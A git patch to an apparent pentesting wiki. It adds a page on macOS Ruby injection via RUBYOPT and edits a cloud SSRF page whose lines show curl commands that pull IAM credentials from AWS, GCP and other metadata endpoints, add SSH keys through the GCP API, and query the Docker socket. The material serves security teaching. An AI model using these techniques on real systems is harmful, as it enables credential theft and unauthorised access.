From f00afc243f6765bebc0fe09ca9579171876ea53e Mon Sep 17 00:00:00 2001 From: CPol Date: Mon, 22 Jan 2024 12:24:45 +0000 Subject: [PATCH] GITBOOK-4241: change request with no subject merged in GitBook --- SUMMARY.md | 1 + .../macos-proces-abuse/README.md | 8 +++ .../macos-ruby-applications-injection.md | 61 +++++++++++++++++++ .../cloud-ssrf.md | 31 +++++----- 4 files changed, 85 insertions(+), 16 deletions(-) create mode 100644 macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md diff --git a/SUMMARY.md b/SUMMARY.md index 289180b1f..298b46b3e 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -179,6 +179,7 @@ * [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md) * [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md) * [macOS Perl Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md) + * [macOS Ruby Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md) * [macOS .Net Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md) * [macOS Security Protections](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md) * [macOS Gatekeeper / Quarantine / XProtect](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md) diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md index 809a3e223..94cbd7e8f 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md @@ -82,6 +82,14 @@ Check different options to make a Perl script execute arbitrary code in: [macos-perl-applications-injection.md](macos-perl-applications-injection.md) {% endcontent-ref %} +### Ruby Injection + +I't also possible to abuse ruby env variables to make arbitrary scripts execute arbitrary code: + +{% content-ref url="macos-ruby-applications-injection.md" %} +[macos-ruby-applications-injection.md](macos-ruby-applications-injection.md) +{% endcontent-ref %} + ### Python Injection If the environment variable **`PYTHONINSPECT`** is set, the python process will drop into a python cli once it's finished. It's also possible to use **`PYTHONSTARTUP`** to indicate a python script to execute at the beginning of an interactive session.\ diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md new file mode 100644 index 000000000..448c99045 --- /dev/null +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md @@ -0,0 +1,61 @@ +# macOS Ruby Applications Injection + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+ +## RUBYOPT + +Using this env variable it's possible to **add new params** to **ruby** whenever it gets executed. Although the param **`-e`** cannot be used to specify ruby code to execute, it's possible to use the params **`-I`** and **`-r`** to add a new folder to the libraries to load path and then **specify a library to load**. + +Create the library **`inject.rb`** in **`/tmp`**: + +{% code title="inject.rb" %} +```ruby +puts `whoami` +``` +{% endcode %} + +Create anywahere a ruby script like: + +{% code title="hello.rb" %} +```ruby +puts 'Hello, World!' +``` +{% endcode %} + +Then make an arbitrary ruby script load it with: + +```bash +RUBYOPT="-I/tmp -rinject" ruby hello.rb +``` + +Fun fact, it works even with param **`--disable-rubyopt`**: + +```bash +RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt +``` + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 19c21af82..8c549a717 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. @@ -133,7 +133,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null | Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role. {% endhint %} -### SSRF for AWS Lambda +### SSRF for AWS Lambda In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**. @@ -149,7 +149,7 @@ Moreover, in addition to IAM credentials, Lambda functions also have **event dat Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app. {% endhint %} -### SSRF URL for AWS Elastic Beanstalk +### SSRF URL for AWS Elastic Beanstalk We retrieve the `accountId` and `region` from the API. @@ -168,13 +168,13 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. -## GCP +## GCP You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata). -### SSRF URL for Google Cloud +### SSRF URL for Google Cloud -Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs: +Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs: * http://169.254.169.254 * http://metadata.google.internal @@ -284,7 +284,7 @@ gcloud config unset auth/access_token_file ``` {% endhint %} -### Add an SSH key +### Add an SSH key Extract the token @@ -315,7 +315,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo ``` {% endcode %} -## Digital Ocean +## Digital Ocean {% hint style="warning" %} There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials @@ -335,7 +335,7 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re curl http://169.254.169.254/metadata/v1.json | jq ``` -
+
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. @@ -477,7 +477,7 @@ At line:1 char:1 Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet ``` -## IBM Cloud +## IBM Cloud {% hint style="warning" %} Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM @@ -509,11 +509,11 @@ curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instanc ``` {% endcode %} -## Packetcloud +## Packetcloud Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata) -## OpenStack/RackSpace +## OpenStack/RackSpace (header required? unknown) @@ -538,7 +538,7 @@ http://192.0.0.192/latest/meta-data/ http://192.0.0.192/latest/attributes/ ``` -## Alibaba +## Alibaba ``` http://100.100.100.200/latest/meta-data/ @@ -564,19 +564,18 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json ``` -## Rancher +## Rancher ``` curl http://rancher-metadata// ``` -
+
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!